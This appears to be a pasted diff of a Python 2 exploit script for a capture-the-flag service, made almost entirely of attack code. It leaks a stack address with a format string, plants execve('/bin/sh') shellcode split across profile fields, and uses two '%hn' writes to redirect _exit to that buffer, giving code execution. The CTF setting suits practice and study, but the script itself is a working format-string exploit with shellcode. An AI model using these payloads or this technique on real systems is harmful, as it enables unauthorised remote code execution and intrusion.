SHOW:
|
|
- or go back to the newest paste.
1 | # -*- coding: utf-8 -*- | |
2 | import socket | |
3 | import struct | |
4 | ||
5 | target_ip = "serv" | |
6 | target_port = 12345 | |
7 | ||
8 | ''' | |
9 | len of first part of the shellcode should be < 20 | |
10 | we use \xeb\x01 (jmp+1) to join the two parts | |
11 | of the shellcode | |
12 | ||
13 | for this chall a bind shellcode is more appropriate than | |
14 | a /bin/sh | |
15 | ||
16 | xor %eax,%eax | |
17 | push %eax | |
18 | push $0x68732f2f | |
19 | push $0x6e69622f | |
20 | mov %esp,%ebx | |
21 | push %eax | |
22 | push %ebx | |
23 | mov %esp,%ecx | |
24 | mov $0xb,%al | |
25 | int $0x80 | |
26 | char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" | |
27 | "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; | |
28 | ''' | |
29 | ||
30 | sc1 = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\xeb\x01" | |
31 | sc2 = "\x89\xe1\xb0\x0b\xcd\x80" | |
32 | ||
33 | sc_status = "AAAA" + "\n" | |
34 | ||
35 | sk = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) | |
36 | sk.connect((target_ip, target_port)) | |
37 | ||
38 | # welcome | |
39 | print sk.recv(4096) | |
40 | ||
41 | # send nick | |
42 | nick = "jojo\n" | |
43 | sk.send(nick) | |
44 | print sk.recv(4096) | |
45 | ||
46 | # retrieve buffer addr : | |
47 | tweet = "\x32"+"\n" | |
48 | sk.send(tweet) | |
49 | print sk.recv(4096) | |
50 | ||
51 | # mem leak | |
52 | mem_leak = "%08x\n" | |
53 | sk.send(mem_leak) | |
54 | data = sk.recv(4096) | |
55 | ||
56 | addr_pos = data.find("\x0a\x0a\x0a") | |
57 | ||
58 | addr_buf_str = data[addr_pos+3:addr_pos+3+8].decode("hex") | |
59 | ||
60 | addr_buff = struct.unpack(">I", addr_buf_str)[0] | |
61 | print "buffer_addr = " + hex(addr_buff) | |
62 | ||
63 | # we put our shellcode divided in two parts | |
64 | # edit profile | |
65 | cmd = "\x31"+"\n" | |
66 | sk.send(cmd) | |
67 | print sk.recv(4096) | |
68 | ||
69 | # send nick sc | |
70 | sk.send(sc1) | |
71 | print sk.recv(4096) | |
72 | ||
73 | # send website sc | |
74 | sk.send(sc2) | |
75 | print sk.recv(4096) | |
76 | ||
77 | # send status sc | |
78 | sk.send(sc_status) | |
79 | print sk.recv(4096) | |
80 | ||
81 | tweet = "\x32"+"\n" | |
82 | sk.send(tweet) | |
83 | print sk.recv(4096) | |
84 | ||
85 | tweet = "\x32"+"\n" | |
86 | sk.send(tweet) | |
87 | print sk.recv(4096) | |
88 | ||
89 | addr_high = addr_buff >> 16 | |
90 | addr_low = addr_buff & 0xFFFF | |
91 | ||
92 | print "addr_high = " + hex(addr_high) | |
93 | print "addr_low = " + hex(addr_low) | |
94 | ||
95 | # send fmt_string | |
96 | # use twice printf format string | |
97 | # HIGH(@_exit) = 0x8049bfe | |
98 | # LOW(@_exit) = 0x8049bfc | |
99 | # rewrite _exit with addr_buff | |
100 | fmt_string = "aa" + struct.pack("<I", 0x8049bfc) + "%" + str(addr_low-6) + "c%5$hn\n" | |
101 | sk.send(fmt_string) | |
102 | print sk.recv(4096) | |
103 | print data | |
104 | tweet = "\x32"+"\n" | |
105 | sk.send(tweet) | |
106 | print sk.recv(4096) | |
107 | fmt_string = "aa" + struct.pack("<I", 0x8049bfe) + "%" + str(addr_high-6) + "c%5$hn\n" | |
108 | sk.send(fmt_string) | |
109 | print sk.recv(4096) | |
110 | ||
111 | print "launch shellcode -> call _exit" | |
112 | ||
113 | - | raw_input("wait") |
113 | + | |
114 | sk.send(tweet) | |
115 | print sk.recv(4096) | |
116 | ||
117 | sk.close() |